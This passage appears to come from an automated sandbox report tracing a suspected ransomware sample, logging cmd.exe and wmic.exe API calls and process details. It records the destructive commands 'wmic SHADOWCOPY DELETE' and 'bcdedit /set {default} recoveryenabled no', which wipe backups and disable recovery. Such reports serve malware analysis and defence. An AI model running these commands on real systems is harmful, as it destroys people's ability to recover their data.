UpdateProcThreadAttribute (in: lpAttributeList=0x26f458, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f458, lpPreviousValue=0x0) returned 1 [0043.855] GetStartupInfoW (in: lpStartupInfo=0x26f570 | out: lpStartupInfo=0x26f570*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0043.855] GetProcessHeap () returned 0x3c0000 [0043.855] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x20) returned 0x3d4610 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0043.855] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0043.856] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0043.856] GetProcessHeap () returned 0x3c0000 [0043.856] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d4610 | out: hHeap=0x3c0000) returned 1 [0043.856] GetProcessHeap () returned 0x3c0000 [0043.856] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x12) returned 0x3d9e90 [0043.856] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0043.858] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f490*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic SHADOWCOPY DELETE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f440 | out: lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessInformation=0x26f440*(hProcess=0x54, hThread=0x50, dwProcessId=0x60c, dwThreadId=0x20c)) returned 1 [0044.007] CloseHandle (hObject=0x50) returned 1 [0044.007] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0044.007] GetProcessHeap () returned 0x3c0000 [0044.007] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dc230 | out: hHeap=0x3c0000) returned 1 [0044.007] GetEnvironmentStringsW () returned 0x3dbf20* [0044.007] GetProcessHeap () returned 0x3c0000 [0044.007] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xae8) returned 0x3dca10 [0044.008] FreeEnvironmentStringsW (penv=0x3dbf20) returned 1 [0044.008] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0061.150] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26f388 | out: lpExitCode=0x26f388*=0x80041002) returned 1 [0061.150] CloseHandle (hObject=0x54) returned 1 [0061.150] _vsnwprintf (in: _Buffer=0x26f5f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f398 | out: _Buffer="80041002") returned 8 [0061.150] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041002") returned 1 [0061.150] GetProcessHeap () returned 0x3c0000 [0061.150] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dca10 | out: hHeap=0x3c0000) returned 1 [0061.151] GetEnvironmentStringsW () returned 0x3dbf20* [0061.151] GetProcessHeap () returned 0x3c0000 [0061.151] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0e) returned 0x3de020 [0061.151] FreeEnvironmentStringsW (penv=0x3dbf20) returned 1 [0061.151] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0061.151] GetProcessHeap () returned 0x3c0000 [0061.151] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3de020 | out: hHeap=0x3c0000) returned 1 [0061.151] GetEnvironmentStringsW () returned 0x3dbf20* [0061.151] GetProcessHeap () returned 0x3c0000 [0061.151] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0e) returned 0x3de020 [0061.151] FreeEnvironmentStringsW (penv=0x3dbf20) returned 1 [0061.151] GetProcessHeap () returned 0x3c0000 [0061.151] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d9e90 | out: hHeap=0x3c0000) returned 1 [0061.151] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f458 | out: lpAttributeList=0x26f458) [0061.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.151] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0061.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0061.152] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.152] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0061.152] SetConsoleInputExeNameW () returned 0x1 [0061.152] GetConsoleOutputCP () returned 0x1b5 [0061.152] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0061.152] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0061.152] exit (_Code=-2147217406) Process: id = "9" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x33134000" os_pid = "0x730" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa54" cmd_line = "bcdedit /set {default} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x78c Process: id = "10" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x33ccd000" os_pid = "0x60c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x32c" cmd_line = "wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x20c [0045.351] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fe50 | out: lpSystemTimeAsFileTime=0x10fe50*(dwLowDateTime=0x2732bcb0, dwHighDateTime=0x1d5f247)) [0045.351] GetCurrentProcessId () returned 0x60c [0045.351] GetCurrentThreadId () returned 0x20c [0045.351] GetTickCount () returned 0x1145e27 [0045.351] QueryPerformanceCounter (in: lpPerformanceCount=0x10fe58 | out: lpPerformanceCount=0x10fe58*=16621311107) returned 1 [0045.351] GetModuleHandleW (lpModuleName=0x0) returned 0xff490000 [0045.351] __set_app_type (_Type=0x1) [0045.351] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4dced0) returned 0x0 [0045.351] __wgetmainargs (in: _Argc=0xff502380, _Argv=0xff502390, _Env=0xff502388, _DoWildCard=0, _StartInfo=0xff50239c | out: _Argc=0xff502380, _Argv=0xff502390, _Env=0xff502388) returned 0 [0045.695] ??0CHString@@QEAA@XZ () returned 0xff502ab0 [0045.729] malloc (_Size=0x30) returned 0x265a50 [0045.741] malloc (_Size=0x70) returned 0x265a90 [0045.741] malloc (_Size=0x50) returned 0x267aa0 [0045.741] malloc (_Size=0x30) returned 0x267b00 [0045.741] malloc (_Size=0x48) returned 0x267b40 [0045.741] malloc (_Size=0x30) returned 0x267b90 [0045.741] malloc (_Size=0x30) returned 0x267bd0 [0045.741] ??0CHString@@QEAA@XZ () returned 0xff502f58 [0045.741] malloc (_Size=0x30) returned 0x267c10 [0045.741] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4a8482c [0045.741] SetConsoleCtrlHandler (HandlerRoutine=0xff4d5724, Add=1) returned 1 [0045.741] _onexit (_Func=0xff4ef378) returned 0xff4ef378 [0045.741] _onexit (_Func=0xff4ef490) returned 0xff4ef490 [0045.741] _onexit (_Func=0xff4ef4d0) returned 0xff4ef4d0 [0045.742] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0045.742] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0045.745] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0045.834] CoCreateInstance (in: rclsid=0xff4973a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff497370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff502940 | out: ppv=0xff502940*=0x1d11390) returned 0x0 [0046.066] GetCurrentProcess () returned 0xffffffffffffffff [0046.067] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x10fc20 | out: TokenHandle=0x10fc20*=0xf4) returned 1 [0046.067] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10fc18 | out: TokenInformation=0x0, ReturnLength=0x10fc18) returned 0 [0046.067] malloc (_Size=0x118) returned 0x2663e0 [0046.067] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2663e0, TokenInformationLength=0x118, ReturnLength=0x10fc18 | out: TokenInformation=0x2663e0, ReturnLength=0x10fc18) returned 1 [0046.067] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2663e0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-737057259, Attributes=0x2b8d), (Luid.LowPart=0x0, Luid.HighPart=2523008, Attributes=0x0), (Luid.LowPart=0x6d0061, Luid.HighPart=4587552, Attributes=0x6c0069), (Luid.LowPart=0x43005c, Luid.HighPart=7143535, Attributes=0x6f006d), (Luid.LowPart=0x690046, Luid.HighPart=6619244, Attributes=0x73), (Luid.LowPart=0x6d006d, Luid.HighPart=7209071, Attributes=0x720050))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0046.067] free (_Block=0x2663e0) [0046.067] CloseHandle (hObject=0xf4) returned 1 [0046.076] malloc (_Size=0x40) returned 0x267f80 [0046.076] malloc (_Size=0x40) returned 0x2663e0 [0046.076] malloc (_Size=0x40) returned 0x266430 [0046.076] malloc (_Size=0x20a) returned 0x266480 [0046.076] GetSystemDirectoryW (in: lpBuffer=0x266480, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.076] free (_Block=0x266480) [0046.076] malloc (_Size=0x18) returned 0x40dfb0 [0046.077] malloc (_Size=0x18) returned 0x266480 [0046.077] malloc (_Size=0x18) returned 0x2664a0 [0046.077] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0046.077] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0046.077] free (_Block=0x40dfb0) [0046.077] free (_Block=0x266480) [0046.077] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0046.077] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0046.077] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.078] FreeLibrary (hLibModule=0x77940000) returned 1 [0046.078] free (_Block=0x2664a0) [0046.078] _vsnwprintf (in: _Buffer=0x266430, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x10f848 | out: _Buffer="ms_409") returned 6 [0046.078] malloc (_Size=0x20) returned 0x266480 [0046.078] GetComputerNameW (in: lpBuffer=0x266480, nSize=0x10fc20 | out: lpBuffer="XDUWTFONO", nSize=0x10fc20) returned 1 [0046.078] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.078] malloc (_Size=0x14) returned 0x40dfb0 [0046.078] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.078] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x10fc18 | out: lpNameBuffer=0x0, nSize=0x10fc18) returned 0x7fffffde000 [0046.079] GetLastError () returned 0xea [0046.079] malloc (_Size=0x40) returned 0x2664b0 [0046.079] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2664b0, nSize=0x10fc18 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10fc18) returned 0x1 [0046.080] lstrlenW (lpString="") returned 0 [0046.080] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.080] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0046.082] lstrlenW (lpString=".") returned 1 [0046.082] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0046.083] lstrlenW (lpString="LOCALHOST") returned 9 [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0046.083] free (_Block=0x40dfb0) [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] malloc (_Size=0x14) returned 0x40dfb0 [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] malloc (_Size=0x14) returned 0x266500 [0046.083] lstrlenW (lpString="XDUWTFONO") returned 9 [0046.083] malloc (_Size=0x8) returned 0x266520 [0046.083] malloc (_Size=0x18) returned 0x266540 [0046.083] malloc (_Size=0x30) returned 0x266560 [0046.083] malloc (_Size=0x18) returned 0x2665a0 [0046.083] SysStringLen (param_1="IDENTIFY") returned 0x8 [0046.083] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0046.083] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0046.083] SysStringLen (param_1="IDENTIFY") returned 0x8 [0046.083] malloc (_Size=0x30) returned 0x2665c0 [0046.083] malloc (_Size=0x18) returned 0x266600 [0046.083] SysStringLen (param_1="IMPERSONATE") returned 0xb [0046.083] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0046.083] SysStringLen (param_1="IMPERSONATE") returned 0xb [0046.083] SysStringLen (param_1="IDENTIFY") returned 0x8 [0046.083] SysStringLen (param_1="IDENTIFY") returned 0x8 [0046.083] SysStringLen (param_1="IMPERSONATE") returned 0xb [0046.083] malloc (_Size=0x30) returned 0x266620 [0046.083] malloc (_Size=0x18) returned 0x266660 [0046.084] SysStringLen (param_1="DELEGATE") returned 0x8 [0046.084] SysStringLen (param_1="IDENTIFY") returned 0x8 [0046.084] SysStringLen (param_1="DELEGATE") returned 0x8 [0046.084] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0046.084] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0046.084] SysStringLen (param_1="DELEGATE") returned 0x8 [0046.084] malloc (_Size=0x30) returned 0x266680 [0046.084] malloc (_Size=0x18) returned 0x2666c0 [0046.084] malloc (_Size=0x30) returned 0x2666e0 [0046.084] malloc (_Size=0x18) returned 0x266720 [0046.084] SysStringLen (param_1="NONE") returned 0x4 [0046.084] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.084] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.084] SysStringLen (param_1="NONE") returned 0x4 [0046.084] malloc (_Size=0x30) returned 0x266740 [0046.084] malloc (_Size=0x18) returned 0x266780 [0046.084] SysStringLen (param_1="CONNECT") returned 0x7 [0046.084] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.084] malloc (_Size=0x30) returned 0x2667a0 [0046.084] malloc (_Size=0x18) returned 0x2667e0 [0046.084] SysStringLen (param_1="CALL") returned 0x4 [0046.084] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.084] SysStringLen (param_1="CALL") returned 0x4 [0046.084] SysStringLen (param_1="CONNECT") returned 0x7 [0046.084] malloc (_Size=0x30) returned 0x266800 [0046.084] malloc (_Size=0x18) returned 0x266840 [0046.084] SysStringLen (param_1="PKT") returned 0x3 [0046.084] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.084] SysStringLen (param_1="PKT") returned 0x3 [0046.084] SysStringLen (param_1="NONE") returned 0x4 [0046.084] SysStringLen (param_1="NONE") returned 0x4 [0046.084] SysStringLen (param_1="PKT") returned 0x3 [0046.084] malloc (_Size=0x30) returned 0x266860 [0046.084] malloc (_Size=0x18) returned 0x2668a0 [0046.084] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0046.084] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.085] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0046.085] SysStringLen (param_1="NONE") returned 0x4 [0046.085] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0046.085] SysStringLen (param_1="PKT") returned 0x3 [0046.085] SysStringLen (param_1="PKT") returned 0x3 [0046.085] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0046.085] malloc (_Size=0x30) returned 0x268000 [0046.085] malloc (_Size=0x18) returned 0x266cc0 [0046.085] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0046.085] SysStringLen (param_1="DEFAULT") returned 0x7 [0046.085] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0046.085] SysStringLen (param_1="PKT") returned 0x3 [0046.085] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0046.085] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0046.085] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0046.085] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0046.085] malloc (_Size=0x30) returned 0x268040 [0046.085] malloc (_Size=0x40) returned 0x266ce0 [0046.085] malloc (_Size=0x20a) returned 0x268fd0 [0046.085] GetSystemDirectoryW (in: lpBuffer=0x268fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.085] free (_Block=0x268fd0) [0046.086] malloc (_Size=0x18) returned 0x266d30 [0046.086] malloc (_Size=0x18) returned 0x266d50 [0046.086] malloc (_Size=0x18) returned 0x266d70 [0046.086] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0046.086] SysStringLen (param_1="\\wbem\\") returned 0x6 [0046.086] free (_Block=0x266d30) [0046.086] free (_Block=0x266d50) [0046.086] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0046.086] free (_Block=0x266d70) [0046.086] malloc (_Size=0x18) returned 0x266d30 [0046.086] malloc (_Size=0x18) returned 0x266d50 [0046.086] malloc (_Size=0x18) returned 0x266d70 [0046.086] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0046.086] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0046.086] free (_Block=0x266d30) [0046.086] free (_Block=0x266d50) [0046.086] GetCurrentThreadId () returned 0x20c [0046.086] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x10f520 | out: phkResult=0x10f520*=0xf8) returned 0x0 [0046.087] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x10f570, lpcbData=0x10f510*=0x400 | out: lpType=0x0, lpData=0x10f570*=0x30, lpcbData=0x10f510*=0x4) returned 0x0 [0046.087] _wcsicmp (_String1="0", _String2="1") returned -1 [0046.087] _wcsicmp (_String1="0", _String2="2") returned -2 [0046.087] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x10f510*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x10f510*=0x42) returned 0x0 [0046.087] malloc (_Size=0x86) returned 0x266d90 [0046.087] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x266d90, lpcbData=0x10f510*=0x42 | out: lpType=0x0, lpData=0x266d90*=0x25, lpcbData=0x10f510*=0x42) returned 0x0 [0046.087] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0046.087] malloc (_Size=0x42) returned 0x266e20 [0046.087] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0046.087] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x10f570, lpcbData=0x10f510*=0x400 | out: lpType=0x0, lpData=0x10f570*=0x36, lpcbData=0x10f510*=0xc) returned 0x0 [0046.087] _wtol (_String="65536") returned 65536 [0046.087] free (_Block=0x266d90) [0046.087] RegCloseKey (hKey=0x0) returned 0x6 [0046.087] CoCreateInstance (in: rclsid=0xff497410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4973f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x10fa18 | out: ppv=0x10fa18*=0x21771d0) returned 0x0 [0046.385] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21771d0, xmlSource=0x10fb60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x266d30), isSuccessful=0x10fbd0 | out: isSuccessful=0x10fbd0*=0xffff) returned 0x0 [0050.243] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21771d0, DOMElement=0x10fa10 | out: DOMElement=0x10fa10*=0x217bc50) returned 0x0 [0050.243] malloc (_Size=0x18) returned 0x266d30 [0050.244] IXMLDOMElement:getElementsByTagName (in: This=0x217bc50, tagName="XSLFORMAT", resultList=0x10fa20 | out: resultList=0x10fa20*=0x2179cc0) returned 0x0 [0050.247] free (_Block=0x266d30) [0050.247] IXMLDOMNodeList:get_length (in: This=0x2179cc0, 